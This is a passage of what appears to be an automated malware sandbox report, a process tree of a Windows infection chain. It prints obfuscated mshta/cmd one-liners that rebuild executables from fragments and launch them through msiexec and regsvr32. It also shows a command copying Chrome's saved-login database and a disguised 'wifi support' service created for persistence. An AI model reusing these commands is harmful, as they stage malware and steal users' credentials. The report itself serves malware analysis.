                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\NcPLicfjt0IaLJbo8lL7wbQO.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                PID:4732
                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\8Jxa79ju21TEHxzVxtHDPgIS.exe
                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\8Jxa79ju21TEHxzVxtHDPgIS.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:1984
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:988
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\BH59OmupnZ_H64g0zOGvlahX.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\BH59OmupnZ_H64g0zOGvlahX.exe"
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:4524
                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\jE9RpXREJJTFeOaqwIRYgxC4.exe
                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\jE9RpXREJJTFeOaqwIRYgxC4.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:976
                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\jE9RpXREJJTFeOaqwIRYgxC4.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\jE9RpXREJJTFeOaqwIRYgxC4.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          PID:6888
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\jE9RpXREJJTFeOaqwIRYgxC4.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\jE9RpXREJJTFeOaqwIRYgxC4.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:1984
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                              8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                              10⤵
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              PID:6444
                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:6384
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:7528
                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                    PID:8220
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:6244
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:7860
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                              PID:8580
                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                              msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                PID:6140
                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                          taskkill -im "jE9RpXREJJTFeOaqwIRYgxC4.exe" -F
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:7568
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\tXM2_xDftghjxB8GMsMyJ0hN.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\tXM2_xDftghjxB8GMsMyJ0hN.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                    PID:6948
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                      PID:1492
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        PID:6668
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7ff88d9edec0,0x7ff88d9eded0,0x7ff88d9edee0
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:1572
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          PID:1108
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1804 /prefetch:2
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:5152
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --mojo-platform-channel-handle=2404 /prefetch:8
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:2200
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2680 /prefetch:1
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:3540
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2660 /prefetch:1
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:5928
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:8
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --mojo-platform-channel-handle=1968 /prefetch:8
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:6076
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --mojo-platform-channel-handle=3352 /prefetch:8
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:6220
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1748 /prefetch:2
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:6724
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,11060068252854470897,16398013006630784539,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6668_1668257018" --mojo-platform-channel-handle=484 /prefetch:8
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:8716
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:3752
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS01DF1F46\Sun0328255c4bce6fb.exe
                                                                                                                                                                                                              Sun0328255c4bce6fb.exe
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:4148
                                                                                                                                                                                                              • C:\ProgramData\3653666.exe
                                                                                                                                                                                                                "C:\ProgramData\3653666.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:3928
                                                                                                                                                                                                              • C:\ProgramData\8060282.exe
                                                                                                                                                                                                                "C:\ProgramData\8060282.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                PID:2664
                                                                                                                                                                                                              • C:\ProgramData\1334550.exe
                                                                                                                                                                                                                "C:\ProgramData\1334550.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                PID:60
                                                                                                                                                                                                              • C:\ProgramData\907386.exe
                                                                                                                                                                                                                "C:\ProgramData\907386.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                PID:1744
                                                                                                                                                                                                              • C:\ProgramData\3421353.exe
                                                                                                                                                                                                                "C:\ProgramData\3421353.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                PID:4596
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT ( "WSCRiPT.SHelL" ). RuN ("C:\Windows\system32\cmd.exe /R copY /Y ""C:\ProgramData\3421353.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN ( ""C:\ProgramData\3421353.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0, trUe ) )
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                  PID:1616
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R copY /Y "C:\ProgramData\3421353.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If "" =="" for %T IN ( "C:\ProgramData\3421353.exe" ) do taskkill -iM "%~nxT" -f
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:3988
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE
                                                                                                                                                                                                                        ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:5480
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT ( "WSCRiPT.SHelL" ). RuN ("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN ( ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0, trUe ) )
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:1108
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ( "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ) do taskkill -iM "%~nxT" -f
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:6720
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT ( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ & CoPy /b /y StbAQR.mZ + NNIZo8.S + _7Ijs.BLD + GX3VA2JI.W + JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u & del /Q *" , 0 ,tRUE ) )
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                PID:7048
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ & CoPy /b /y StbAQR.mZ + NNIZo8.S + _7Ijs.BLD + GX3VA2JI.W + JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u & del /Q *
                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                    PID:7520
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                        PID:8172
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"
                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                          PID:7376
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                          regsvr32 /s ..\WAvZq~GT.C /u
                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                          PID:3124
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                    taskkill -iM "3421353.exe" -f
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:5052
                                                                                                                                                                                                                            • C:\ProgramData\8477978.exe
                                                                                                                                                                                                                              "C:\ProgramData\8477978.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4516
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:68
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                                                                                      "C:\Windows\SysWOW64\chkdsk.exe"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Adds policy Run key to start application
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      PID:5576
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        /c del "C:\Users\Admin\Pictures\Adobe Films\IMA9sF2zF4oCz4D5e7hciUYM.exe"
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5156
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:7264
                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:8004
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmmon32.exe
                                                                                                                                                                                                                            "C:\Windows\SysWOW64\cmmon32.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2588
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2AF5.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\2AF5.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:4044
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2AF5.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2AF5.exe
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:3744
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\46BC.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\46BC.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                              PID:3416
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\eiclvsgs\
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:6568
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qiahgxip.exe" C:\Windows\SysWOW64\eiclvsgs\
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4872
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" create eiclvsgs binPath= "C:\Windows\SysWOW64\eiclvsgs\qiahgxip.exe /d\"C:\Users\Admin\AppData\Local\Temp\46BC.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:8812
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" description eiclvsgs "wifi internet conection"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:8708
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start eiclvsgs
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3404
                                                                                                                                                                                                                                        • C:\Users\Admin\skcjizkr.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\skcjizkr.exe" /d"C:\Users\Admin\AppData\Local\Temp\46BC.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          PID:8360
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ylursxjw.exe" C:\Windows\SysWOW64\eiclvsgs\
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:396
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
